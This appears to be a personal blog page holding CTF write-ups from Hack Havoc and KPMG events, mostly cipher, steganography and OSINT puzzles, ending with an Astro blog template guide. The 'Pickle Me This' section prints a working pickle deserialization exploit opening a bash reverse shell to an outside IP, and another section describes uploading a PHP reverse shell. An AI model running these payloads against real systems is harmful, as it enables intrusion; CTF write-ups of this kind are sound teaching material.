To get flag we need to give answers to 50 question
Answers we have to fetch from json file - Height and Year for the mountain as asked in the question.
And We need a script to do it.
After understanding the requirements, made a to-do list and with the help of chatgpt written a script

import socket
import json

with open("mountains.json", "r") as file:
    mountains = json.load(file) 
mountain_dict = {m["name"]: (m["height"].replace(",", ""), m["first"]) for m in mountains}
HOST = "challenge.ctf.games"
PORT = 30954
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    
    data = s.recv(1024).decode()
    print(data)
    yes = input()
    s.sendall(yes.encode() + b"\n")
    
    for i in range(102):
        data = s.recv(1024).decode()
        print(str(i)+data) #0 index will be take by initial data "awesome..."
        if "What is the height and first ascent year of" in data:
 
            mountain_name = data.split("What is the height and first ascent year of ")[1].strip().replace(":", "")
            if mountain_name in mountain_dict:
                height, ascent = mountain_dict[mountain_name]
                response = f"{height},{ascent}\n"
            else:
                response = "none,none\n" #as per question
            s.sendall(response.encode())

Working flow of script:
- Load the JSON File
  - Opens the file mountains.json in read mode.
  - Parses the JSON content into a Python object (mountains).
- Create a Dictionary (mountain_dict)
  - Extracts each mountain's name, height, and first ascent year from the JSON data.
  - Removes commas from height values (e.g., "8,848" → "8848").
- Establish a Connection with the Server
  - Defines HOST = "challenge.ctf.games" and PORT = 30954.
  - Creates a TCP socket using socket.AF_INET and socket.SOCK_STREAM.
  - Connects to the specified host and port.
- Receive Initial Data from the Server
  - Reads up to 1024 bytes from the socket.
  - Decodes and prints the received message.
- Send an Initial Response
  - Waits for user input “Y”.
  - Sends the response to the server, appending a newline (\n).
- Process Incoming Questions (Loop for 102 Iterations)
  - Receives a message from the server (up to 1024 bytes).
  - Prints the received message, prefixed with the loop index.
- Extract Mountain Name from Server's Question
  - Checks if the message contains "What is the height and first ascent year of".
  - Extracts the mountain name from the question.
- Look Up the Mountain Information
  - Searches for the mountain name in mountain_dict.
  - If found, retrieves its height and first ascent year.
  - Constructs a response in "height,year\n" format.
  - If not found, sends "none,none\n".
- Send the Response to the Server
  - Encodes the response and sends it via the socket.
- Loop Repeats Until All Questions Are Answered
Script Execution

flag{33e043f76c3ba0fe9265749dbe650940}

HACK HAVOC CTF Writeups Oct 2024

Thu, 08 Aug 2024 00:00:00 GMT

Hack Havoc CTF Writeups October 2024

Welcome

Here you will get the last part of the flag from Instagram and other half from Discord through bot
First Half

Second Half

CM{w3lc0m3_t0_H4ac_H4voc}

Mobile

APK-ocalypse Now!

I used https://github.com/skylot/jadx for decompiling the APK file,
After decompiling it i hope around little bit and after some searching found a string which looks like flag but maybe encoded or something,

So I open up CyberChef, and first I try the ROT13 cipher, which is a variation of the caesar cipher.

And Boom!!! I got the flag.

CM{H1dd3n_7L4g_1n_M4nIF35T}

Steganography

Incidents in Disguise

First thing when image any lame hacker thing a lame thing which is steganographic image and i am also lame so i also tried it and yes i was right because an image size 500KB which is very odd so i try to use https://github.com/StefanoDeVuono/steghide tool for reveling content but it was password protected.

So I decided to perform a dictionary attack on this using the https://github.com/RickdeJager/stegseek tool (which is a stehide password-ptotected file cracker) using rockyou.txt wordlist (So Called Hacker’s Wordlist). but unfortunately it is not windows so i used in linux system.
But after trying different thing like doing plain attack, reversing the whole rockyou and doing different combination i was unable solve it.
After this, I have decided to see the hint on Discord, which is, Password contains amos amos amos, and it also mentioned that try to do it manually so know there may be some non-printable characters problem.
So i tries this and boom!!! it worked

CM{Bru73_f0rc3_i5_b35t}

p13ces

When I visit the website i got many pages and images so i decided to download all those images,
There are in total 10 images,

So again i tries https://github.com/StefanoDeVuono/steghide on each image and i got piece of flag from 2.jpg.

Also Take the content and make a that as wordlist because it maybe work as key to open the next images,

I tried every other image to open with password but each image needs password so go for next step,
After trying on couple of images i finally get new flag from 6.jpg,

Again doing same thing, take the flag piece and append all those words on wordlist,

From This 9.jpg.out we get a https://pastebin.com/V3nbr0sm link which leads to another piece of flag,

So finally got the final piece,

Now this is Assembling time,

I Think maybe some thing missing so i looked up all the images and I got blink and boom got all flag just like this,
By assembling the images,

CM{{Break_1t_1int0_p13ces}

I think i got the flag and submitted but Incorrect!!!!!!!!!!!!!!!!!!!!
So I Thought i missed something which is Part 4th’s Description,

At last, Lira reached the heart of the forest, where a small clearing lay undisturbed. In the center, a worn parchment was pinned to the ground. Written on it was the a riddle that can contain the final clue:

"In the realm of shapes, I’m the base of a square
In the world of shapes, I form a perfect square,
A hint lies in balance; I help you explore,
Count me well, and you’ll see I am more.
I'm just a single digit number, all alone."

It dawned on her, she had to put all the pieces together to unlock the final part of the 5 pieces hidden message.

FLAG: CM{xxxxx_#x_#xxx#_#_x##xxx}

I have to put it in the format mentioned so here is a poem which gives hints about it,
”#” means numbers and “x” means Alphabets so let’s arrange it,

Everything Looks Perfect but this “#” means a number is missing which i got from that silly poem,

"In the realm of shapes, I’m the base of a square
In the world of shapes, I form a perfect square,
A hint lies in balance; I help you explore,
Count me well, and you’ll see I am more.
I'm just a single digit number, all alone."

It is single digit number and 4 is perfect square so here is the whole FLAG.
Haaaa, Easyyyyy Peasyyyyyy. 🫠

CM{Break_1t_1int0_4_p13ces}

OSINT

Hack Uncovered

Based on the description and some common sense, I found this PDF from Linkedin Cybermaterial Page,

We need to create a flag related to a document about incidents or alerts from July 2024.
This PDF should contain the information we need to create the flag.
And Here is The Flag Easy,
- Top Threat - DarkGate
- Top Vulnerability - CVE-2024-5217
- Top Regulations - KOPSA

CM{DarkGate_CVE-2024-5217_KOPSA}

CyberMaterial Edition!

Following the given description, I applied the same approach and searched on Instagram. This led me to find the relevant post.

After some scrolling I got the flag in the dark shade, Why this is much of easy, 🫠

CM{H4LL_of_H4ck5_Thr3aTs}

Reverse Engineering

More Like ‘Enig-me’

This challenge was the hardest one in the CTF, and I was stuck on it for several days. Fortunately, the hint provided the rotor configurations, positions, reflector, and plugboard settings, which simplified things a bit. They lowered the difficulty level, making it more manageable.
Here is the Settings,
- Rotors : I-II-III
- Reflector : B
- Position : A-D-F (1-4-6)
- Ring : A-A-A (1-1-1)
- Plugboard : A-T B-L

Encoded txt : ugtyq djiwc ruejq ebdux hcrqr kiznu hokzy sngry zfxnv gbjki dqknr ma

Decoded txt: cybermateial is the world number one cybersecurity data platform.

CM{Rotor_I-II-III_Pos_A-B-C_Reflector_B_Plug_A-T_B-L_Ring_A-A-A}

Misc

The Case of the Missing Flag

When I open this DAT file it is not actually DAT file but SVG file with some weird Values,

So I opened it on https://www.svgviewer.dev/ Website,

I First Contact I don’t see anything, and I think it is empty, but after looking carefully, I can see the small dot or something.

So I Make it Bigger from the code by just tweaking the high and width, (width="300" height="300” from width="1" height="1”)

This is QR Code but It is Damaged or Intentionally Damaged QR and Those 3 Squares which is contain the finder pattern ****so we need to fix it,
So I just need to that one Square on Left Corner so I just Tweak The M-1 to M1, Ya That’s It and i got the flag.

I save that QR code and scan it through zbarimg (https://manpages.ubuntu.com/manpages/bionic/man1/zbarimg.1.html)
And Got The Flag Boom!!!!!!! 🫠

CM{F0r3n3ic_1s_34sy}

Cryptography

The Curious Case of the Jumbled Symbols

This Challenge is very piece of cake because i have just google the cipher, and got this,
Some History : Runes are ancient alphabets (More about https://en.wikipedia.org/wiki/Rune#:~:text=A rune is a letter,and for specialised purposes thereafter)

I Have to Translate The Cipher and Got The Flag!!!!!!! 🫠

CM{stauiliss_ruins_muharg}

CyberMaterialHavoc

• This cipher is unknown to me because I have never seen it before, so I just went to “https://www.dcode.fr/” (one of the best tools for crypto stuff) and I searched for a cipher identifier, and I got this one,

It is Base92 Encoding so I decode it,

Base92 Encoding :- AgTIEe5hQ?T5,W.GDyv^N*eRcDuEoizyHNSTN&b$$4m0o9gWL!S\u+^T;/o5m/9YL@HQlje}

Now this cipher is looks common so I again Copy it and Identify which encoding is this,

It is a https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher which is another Polyalphabetic Substitution • So I want to decode it, but I need a key for this, so I see around. I have a clue that it must be given anywhere, so I look at the description,

CybermaterialHavoc can be key because it is written without space so tried and Boom!!!!! It works, and again, using dcode itself, I decode it,

Vigenère cipher :- ZL{YfphiGdxdicgo_Yzkqu'i_Cmtg_Qfpdiscxawtiz_Xdxl_Khdxcltu}

It gives something so i again identify which cipher is it and i got was,

Atbash Cipher :- XN{XbyviNzgvirzo_Dliow'h_Yvhg_Xbyvihvxfirgb_Wzgz_Kozgulin}

Yes, Atbash Cipher so i decode it, and Done!!!!!!!!!!!!! Got The Flag!! 🫠

CM{CyberMaterial_World's_Best_Cybersecurity_Data_Platform}

Boot To Root

Hacker's Fortress

We visit the website. It is a simple PHP-based site, and it has a login form and one registration form, so I first register and log in.

It has a file upload feature, so as you know what a lame hacker does, 😑 Just upload the PHP shell and get the reverse shell, so for this, spin up the environment.
Starting ngrok (reverse shell over internet) and netcat.

And modify the stupid PHP payload of pentestmonkey and do some editing like ports, etc.

And Upload the shell on website,

And through some directory busting I know that it has an upload directory, and it has my shell uploaded.

And Detonate the Reverse shell B00M!!!!! Got the Shell!!!!!!!!!!.

After Some Hopping around i finally got the flag,

CTF{3sc4l4t3d_t0_r00t}

Web

Dir Dash

I opened the website and plan to first enumerate the sensitive files,

So I run the https://github.com/maurosoria/dirsearch and got something interesting,
- /robots.txt

When I visit the robots.txt it seems normal but scroll bar looking spooky like it means file is too large so check and this what i got!!!!

I found this another section, but yeah they fooled us,

But Watching Carefully I got the something,

It looks like Hash but i don’t know where to use it, this is where hint helps,
Which means we have to do FUZZING of file extensions

Domain//////hash............extensions

So i have tries this hash with https://github.com/ffuf/ffuf and try to FUZZ on extension,

ffuf -u http://edition1.ctf.cybermaterial.com/c5ba7ff1883453170f7590fa689f1f48FUZZ -w /mnt/d/Cyber_Stuff/SecLists-master/Discovery/Web-Content/web-extensions.txt

And I Found .aspx file extension so i try to access that file and B00M!!!! I got the flag!!!

CM{3xten5i0n5_w45_CR4zY}

Pickle Me This Cookie Jar Shenanigans!

This Challenge was quite interesting and challenging also,
When we visit the website it looks like this,

As per mentioned in description we know that this server has cookie deserialization vulnerability in pickle (CVE-2022-34668) and we have to exploit it.
After some googling around i found some pickle exploit scripts but many of them not properly working so after some head smashing finally got the script which work perfectly.

from base64 import b64encode
import pickle
import subprocess

# Define a class for malicious deserialization
class anti_pickle_serum(object):
    def __reduce__(self):  # Use double underscores
        # This is where the reverse shell command will be executed
        return subprocess.Popen, (["/bin/bash", "-c", "bash -i >& /dev/tcp/13.127.206.16/15354 0>&1"],)

# Serialize the payload and encode it
pickled = pickle.dumps({'serum': anti_pickle_serum()}, protocol=0)
encoded_pickled = b64encode(pickled)

# Print the base64 encoded malicious payload
print(encoded_pickled.decode())

Steps of Exploitation,
1. Setup The Environment,
  1. Start the NGROK Server
  2. Start the Ncat Server
  3. Prepare a Reverse Shell Payload to Put in Script
2. Creating the Payload Using Above Script
3. Go to the Webpage
4. Add Any Item in Cart
5. Go to Cart Section
6. Open up the Application Section Inspect
7. Replace the Malicious Cookie and Just Refresh and B00M!!!! Got a Shell 🫠

"/bin/bash -c 'bash -i >& /dev/tcp/13.127.206.16/15354 0>&1'"

CM{c0Ngr47S_y0u_ArE_A_Ser1A1_KI11er}

Hashing Numbers

When we visit this Website, and click in , we can press on Enter Now and i will redirect to another page,

After Redirection, We see a puzzled text something like 742-AJM and we have to unscramble this,
And scrolling down we an image of dial pad,

There also one button named “enter hash---→” which will redirect us to another page which ask for hash and correct hash will provide us flag.

So Again We have one image of dial pad When Any Lame Hacker See any image, then they always try stupid things like steg…. so let’s try that,

From this we got some python code, which do something spooky so let’s analyze it,

#You are tasked with securing a sensitive file. To ensure its integrity, 
#you must calculate the SHA-256 hash of the file contents.

import hashlib

# Calculate the value of the mathematical expression

# Replacing Number with its words
# eight = 8, three = 3, two = 2
#value = (5 * eight) + (three * 6) - (two * 4)
value = (5 * eight) + (three * 6) - (two * 4)

# Convert the value to a string
value_str = str(value)

# Calculate the SHA-256 hash
hash_object = hashlib.sha256(value_str.encode())
hash_hex = hash_object.hexdigest()

print(hash_hex)

#Once you have calculated the value of this expression, 
#hash the resulting string using the SHA-256 algorithm. What is the hash?

Output: 1a6562590ef19d1045d06c4055742d38288e9e6dcd71ccde5cee80f1d5a774eb

We try to enter it into website input field above mentioned, and

If we follow the page and and active dark mode and scroll to the end we got the flag,

But this is not it, we have to make it according to this description,
You are tasked with securing a sensitive file. To ensure its integrity, you must calculate the SHA-256 hash of the file contents.
Flag structure: CM{XXX-###_##}

CM{SHA256_unhashedvaluenumber}
CM{SHA-256_##}

So as We can see that we have made our flag as per format but there are 2 digits which still missing so, in this we have to do this,
As per previous code,
- $value = (5 * eight) + (three * 6) - (two * 4)$
- $eight = 8, three = 3, two = 2$
- $(5 * 8) + (3 * 6) - (2 * 4)$
- $40 + 18 - 8 = 50$
So Here is The Flag,

CM{SHA-256_50}

Cloud

Cloudy Records

On the given website, I found nothing. I tried multiple things, like checking the request and response headers, but nothing got any info that it is not cloud.
Then I try to do something that is very straight forward and that any lame hacker thinks like. I have a domain, so I have tried to see a DNS lookup and DNS records on this website: https://dnschecker.org/
And Oooo.. I got something here,

https://storage.googleapis.com/cloudcorps-important/

A Google storage link in TXT records, neet 🫡
Then I try to access it, and this is what I got.

There are some files mentioned like,
1. Hall_of_Hacks_1.pdf
2. Hall_of_Hacks_2.pdf
3. Hall_of_Hacks_3.pdf
So Try to access those files through same URL by just appending files and B00M!!!!!!
I got the flag.🫠

https://storage.googleapis.com/cloudcorps-important/Hall_of_Hacks_2.pdf

CM{GCP_CloudStorage_Bucket_Challenge_20241018}

Forensics

QR-azy Mystery!

After downloading this file it looks like this,

It is blurred QR-code so we have to make sharper so we can scan it properly,
I have done this through https://picsart.com/create/editor?category=myFolders&projectId=671fb73d7ff5f51af2d7fee6 and here is the result,

And when i scanned it, I got the flag,

flag{3efd4bd34663e618c70e051505c83f9f}

Dialing for Danger

When I open this file it gives me random numbers,

4 666 555 3 33 66 0 4 2 8 33 0 22 777 444 3 4 33

It looks like cipher so let’s identify which type of cipher is it,

It is a Multi-Tap Phone (SMS) Encoding Scheme

And When I decrypt it I found this 3 strings so we have to make flag from it as per description and Gochaa!! Flag is correct!! 🫠

CM{GOLDEN_GATE_BRIDGE}

KPMG CTF Writeups Aug 2024

Mon, 01 Apr 2024 00:00:00 GMT

KPMG CTF

Welcome

We can directly cat the flag file from the website terminal,

Cloud

Presign Rains

Here, after completing the cloud challenge, I was excited to solve this challenge, but here we got a website link.

From the website, there is no hint related to flag, so I looked at the source code:

Here we got the access key and bucket:

access key → AKIA33VJAWOZJLLBCU2A bucket: ctf2k24-best

First, I thought of using AWS cli, but it also needs a secret key and region. So I tried reconnaissance further, and it led to robots.

Here we got many things. I thought there would be credentials in this directory, but these were the credentials. the robot directory:

Link :- [https://<bucket-name>.s3.us-east-1.amazonaws.com/flag.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=<aws access key>%2F20240808%2F<region>%2Fs3%2Faws4_request&X-Amz-Date=<Date>&X-Amz-Expires=<expire-time>&X-Amz-SignedHeaders=host&X-Amz-Signature=](https://ctf2k24-best.s3.us-east-1.amazonaws.com/flag.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIA33VJAWOZJLLBCU2A%2F20240808%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240808T094405Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=5625d8f847a29410e05b91df5628d6d2fa8146eed792c0ae048279798853d1b9)<singature>
From this link, it was clear that the credential can be used here, and we will get the flag.
Credential used here:

bucket -> ctf2k24-best

access key → AKIA33VJAWOZJLLBCU2A

Expires → 604800

date → 20240808T094405Z

region → us-east-1

signature → 5625d8f847a29410e05b91df5628d6d2fa8146eed792c0ae048279798853d1b9

Here, I thought that I had to use this directory in the link:

I got an error, then I tried using this directory path on the link they have provided and i got the flag, 🫡

Data Valut Duel

From the description, I can see that the bucket name is given, which is publicly accessible, but I don’t have the AWS account, so I am not able to use AWS-cli directly, so I searched for this and got this AWS flag from searching.

aws s3 ls s3://kpmg-ctf1 --no-sign-reques

From this command, I got some info about the bucket, like the available files in it, and one of the files is rituognriteuonhbiorentgbvhuitrhoirtsnbiuort.txt.

but without credentials, I can’t access this, so again, I tried to google how I could access it, and I found that using wget or curl, we can directly access that S3 bucket.

curl -O https://kpmg-ctf1.s3.ap-south-1.amazonaws.com/rituognriteuonhbiorentgbvhuitrhoirtsnbiuort.txt

Using this command, I can curl the flag directly. hehe Piece of Cake 🫠

OSINT

Hacking The Admins

From the text I guess that we have to search for the name Raghava Sai Sarva and I got a LinkedIn link:

There is a hash in the description it is a base64 hash:

TmV2ZXlgZ29ubmEgZ212ZSB5b3UgdXAKTmV2ZXlgZ29ubmEgbGVOlHlvdSBkb3duCk51dmVylGdvbm5hlHJ1 bmQ gYW5klGRlc2VydCB5b3UKTmV2ZXlgZ29ubmEgbWFrZSB5b3UgY3J5Ck51dmVylGdvbm5hlHNheSBnb29kYnllCk51dmVylGdvbm5hlHRlbGwgYSBsaWUgYW5klGh 1 cnQgeW91 CgpodHRwczovBBhc3RlYmluLmNvbS9uWm1 ibkJRMyAtlG 1 lb3c=

After decoding using CyberChef:

I got a Pastebin link, let go and see what is there in the link:

From Previous Pastebin I got LinkedIn link and text that tells me to check the discord of eren_meow account,

Here we got a base58 hash:

let's go to the link::

It password Protected so check out the discord account mentioned previously eren_meow, then let check the discord:

here we got an hash that is Base58:

Then We open the pastebin using meowsaurabh123! password,

Here again we got a LinkedIn link and a brainfuck code:

In the LinkedIn they have given a pastebin link:

I got the flag 🫡

Web

Memorandum Dissolve 5

In this Challenge I got an login page:

As I first checked the source code of the page(which i think is a best practice), Here, they have provided the test username and password

after logging in, I got a Welcome page, here I opened the inspect tool, for checking if there is any cookie is being used and i got the session cookie

The session looked like it was an md5 hash so i tried to crack it using online decoder(https://md5hashing.net/hash/md5/2cb42f8734ea607eefed3b70af13bbd3):
MD5 hash:

test → 098f6bcd4621 d373cade4e832627b4f6
As I suspected, the session key is the username so i tried using admin md5 hash as a session key
MD5 hash:

admin → 21232f297a57a5a743894aee4a801fc3

And we got the Flag. 🫡

ISC

Assassins Brotherhood - 1

As per the description, we have given the URL, host, and port.
First, I do the http://0.cloud.chals.io 27232 And from this, I know that on this port, SSH is running By showing the SSH header, I got.
After that i try to access the website,

After that, I viewed the page source, and I got this from it

And I said I knew that one server, SSH, was running, and this statement pointed out the username and password of the Ezio user, so i try to connect with SSH,
Connected Successfully and got flag on ezio.txt file, 🫠

Crypto

Micro RSA

From this challenge i got values.txt file which contains this information,

n=124654455290240170438072831687154216330318678151127912274279675542477378324205547190448356708255017687037267403854771170485302392671467974951403923256433631043504787586559727625072674672756729381597771352105733117303538360769540765664178969569213281846028712352533347099724394655235654023223677262377960566427
e=3
c=11127001790949419009337112638492797447460274274218482444358708583659626034144288836997001734324915439994099506833199252902923750945134774986248955381033641128827831707738209340996252344658078512599270181951581644119582075332702905417250405953125

I make a python script which performs RSA encryption padding attack,
Reference - https://shainer.github.io/crypto/matasano/2017/10/14/rsa-padding-oracle-attack.html

from decimal import *
from tqdm import tqdm

N = Decimal(124654455290240170438072831687154216330318678151127912274279675542477378324205547190448356708255017687037267403854771170485302392671467974951403923256433631043504787586559727625072674672756729381597771352105733117303538360769540765664178969569213281846028712352533347099724394655235654023223677262377960566427)
e = Decimal(3)
c = Decimal(11127001790949419009337112638492797447460274274218482444358708583659626034144288836997001734324915439994099506833199252902923750945134774986248955381033641128827831707738209340996252344658078512599270181951581644119582075332702905417250405953125)

def int_to_ascii(m):
    # Decode to ascii (from https://crypto.stackexchange.com/a/80346)
    m_hex = hex(int(m))[2:-1]  # Number to hex
    m_ascii = "".join(
        chr(int(m_hex[i : i + 2], 16)) for i in range(0, len(m_hex), 2)
    )  # Hex to Ascii
    return m_ascii

# Find padding
getcontext().prec = 280  # Increase precision
padding = 0
for k in tqdm(range(0, 10_000)):
    m = pow(k * N + c, 1 / e)
    m_ascii = int_to_ascii(m)

    if "pico" in m_ascii:
        padding = k
        break

print("Padding: %s" % padding)

# Increase precision further to get entire flag
getcontext().prec = 700

m = pow(padding * N + c, 1 / e)
m_ascii = int_to_ascii(m)
print("Flag: %s" % m_ascii.strip())

After Running this script, I got the flag!!

KPMG_CTF{sm4ll_e_15_n07_s0_s3cur3}

Crypts Beyond The Wall

When I tried to access the website, I got this:

Winter is Coming: If you are a true fan of Game of Thrones, then you know this line:

Now I try to open the source code, and from that I get this comment:

When I tried to decode this encoded base64 string, I got 'Tormund.txt'.

Then I tried to access that page, and I got this:

And from that page, I got another BeyondTheWallsLogs.txt and a hint giantsmik file, which gives me,

From this image, I got a cipher text, which I think is vigenere cipher so I tried to decode it with the key giantsmilk.

From that, I got /S3cr3Ts0ftH3Wa1L4nD83YonD.html and from this file, I got the flag.

Mobile

Android CryptoQuest

From the description, we got the apk file mobilechall1.apk.
After decompiling the file with jadx-gui software for Windows,.
After digging around in the decompiled classes and Java files, I found an example. example.ctfchall package which contains the class files of the decompiled code, and from this directory, i got the MainActivity file, which contains the half-flag in encoded format.

After decoding this base85-encoded string, I got to know that this flag was pointing out something, which is AndroidManifest.xml file,

Then check out the AndroidManifest.xml file and hurray i got the another part of flag then i decode it with base64 scheme and assemble the flag,

Assembling the Flag,

OT

Modulus bus Station

As per decryption, I can understand that I have to use the Modbus client tool to connect with the protocol. After some searching, I found a tool named modbus_cli.

pip install modbus-cli

After installing it, I saw the manual for its usage, and after a while, I knew how to use it and got some raw data bytes in hex.

I cleaned up the data in these 3 steps:
1. First, grep all the hex data and remove other stuff in a file.
2. Then I convert each bytes hex to ASCII character equivalent.
3. Then remove all the duplicate bytes from the data.
4. Then combine all the data.

Then i try to decode it from CyberChef and i got the flag, 🫠

mqtt - Master Qutie TT - P1

As per the decryption given, we have to access the HVAC system and try to subscribe to all the subtopics.
So first of all, I don’t know how to access the mqtt service, so I just did a Google search and got the treasure.
1883: Pentesting MQTT (Mosquitto)
From this, I know which tool to use and how to use it, so I use Mosquito.

apt-get install mosquitto mosquitto-clients # Install the tool

From Blog, I used the -t option for subscribing to all the subtopics, and from that, I got the flag. 🕺

Simple Guides for Fuwari

Mon, 01 Apr 2024 00:00:00 GMT

Cover image source: Source

This blog template is built with Astro. For the things that are not mentioned in this guide, you may find the answers in the Astro Docs.

Front-matter of Posts

---
title: My First Blog Post
published: 2023-09-09
description: This is the first post of my new Astro blog.
image: ./cover.jpg
tags: [Foo, Bar]
category: Front-end
draft: false
---

Attribute	Description
`title`	The title of the post.
`published`	The date the post was published.
`description`	A short description of the post. Displayed on index page.
`image`	The cover image path of the post.<br/>1. Start with `http://` or `https://`: Use web image<br/>2. Start with `/`: For image in `public` dir<br/>3. With none of the prefixes: Relative to the markdown file
`tags`	The tags of the post.
`category`	The category of the post.
`draft`	If this post is still a draft, which won't be displayed.

Where to Place the Post Files

Your post files should be placed in src/content/posts/ directory. You can also create sub-directories to better organize your posts and assets.

src/content/posts/
├── post-1.md
└── post-2/
    ├── cover.png
    └── index.md